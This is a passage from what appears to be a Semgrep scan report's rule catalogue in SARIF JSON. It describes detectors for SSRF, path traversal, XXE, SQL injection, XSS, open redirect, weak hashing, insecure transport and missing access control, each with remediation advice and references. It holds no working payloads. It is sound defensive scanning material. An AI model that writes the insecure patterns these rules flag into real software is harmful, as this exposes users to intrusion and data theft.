Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-ssrf.express-ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","id":"ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","name":"ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library."},"help":{"markdown":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","id":"python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","name":"python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"setMultipleAllowances() is missing onlyOwner modifier"},"help":{"markdown":"setMultipleAllowances() is missing onlyOwner modifier\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control)\n - [https://twitter.com/danielvf/status/1494317265835147272](https://twitter.com/danielvf/status/1494317265835147272)\n - [https://etherscan.io/address/0x876b9ebd725d1fa0b879fcee12560a6453b51dc8](https://etherscan.io/address/0x876b9ebd725d1fa0b879fcee12560a6453b51dc8)\n - [https://play.secdim.com/game/dapp/challenge/rigoownsol](https://play.secdim.com/game/dapp/challenge/rigoownsol)\n","text":"setMultipleAllowances() is missing onlyOwner modifier"},"helpUri":"https://semgrep.dev/r/solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","id":"solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","name":"solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.react-href-url.react-href-url)\n - [https://github.com/segmentio/ui-box/blob/master/src/utils/safeHref.ts](https://github.com/segmentio/ui-box/blob/master/src/utils/safeHref.ts)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase."},"helpUri":"https://semgrep.dev/r/typescript.react.react-href-url.react-href-url","id":"typescript.react.react-href-url.react-href-url","name":"typescript.react.react-href-url.react-href-url","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.react-href-url.react-href-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request)\n - [https://godoc.org/github.com/dghubble/sling#Sling.Add](https://godoc.org/github.com/dghubble/sling#Sling.Add)\n - [https://github.com/dghubble/sling](https://github.com/dghubble/sling)\n","text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value."},"help":{"markdown":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-redirect-to.check-redirect-to)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)\n","text":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","id":"ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","name":"ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-redirect-to.check-redirect-to"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","id":"python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","name":"python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'."},"help":{"markdown":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'."},"helpUri":"https://semgrep.dev/r/go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","id":"go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","name":"go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","properties":{"precision":"very-high","tags":["CWE-300: Channel Accessible by Non-Endpoint","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","id":"java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","name":"java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected possible formatted SQL query. Use parameterized queries instead."},"help":{"markdown":"Detected possible formatted SQL query. Use parameterized queries instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.formatted-sql-query.formatted-sql-query)\n - [https://stackoverflow.com/questions/775296/mysql-parameterized-queries](https://stackoverflow.com/questions/775296/mysql-parameterized-queries)\n","text":"Detected possible formatted SQL query. Use parameterized queries instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.formatted-sql-query.formatted-sql-query","id":"python.lang.security.audit.formatted-sql-query.formatted-sql-query","name":"python.lang.security.audit.formatted-sql-query.formatted-sql-query","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.formatted-sql-query.formatted-sql-query"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`."},"help":{"markdown":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","id":"terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","name":"terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/clojure.lang.security.use-of-sha1.use-of-sha1)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications."},"helpUri":"https://semgrep.dev/r/clojure.lang.security.use-of-sha1.use-of-sha1","id":"clojure.lang.security.use-of-sha1.use-of-sha1","name":"clojure.lang.security.use-of-sha1.use-of-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: clojure.lang.security.use-of-sha1.use-of-sha1"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file."},"help":{"markdown":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.filesystem.world-writable-file.world-writable-file)\n - [https://wiki.sei.cmu.edu/confluence/display/c/FIO06-C.+Create+files+with+appropriate+access+permissions](https://wiki.sei.cmu.edu/confluence/display/c/FIO06-C.+Create+files+with+appropriate+access+permissions)\n","text":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.filesystem.world-writable-file.world-writable-file","id":"cpp.lang.security.filesystem.world-writable-file.world-writable-file","name":"cpp.lang.security.filesystem.world-writable-file.world-writable-file","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.filesystem.world-writable-file.world-writable-file"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design."},"help":{"markdown":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec)\n - [https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec](https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec)\n - [https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec](https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec)\n","text":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","id":"terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","name":"terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","properties":{"precision":"very-high","tags":["CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')","CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/827.html](https://cwe.mitre.org/data/definitions/827.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","id":"java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","name":"java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: 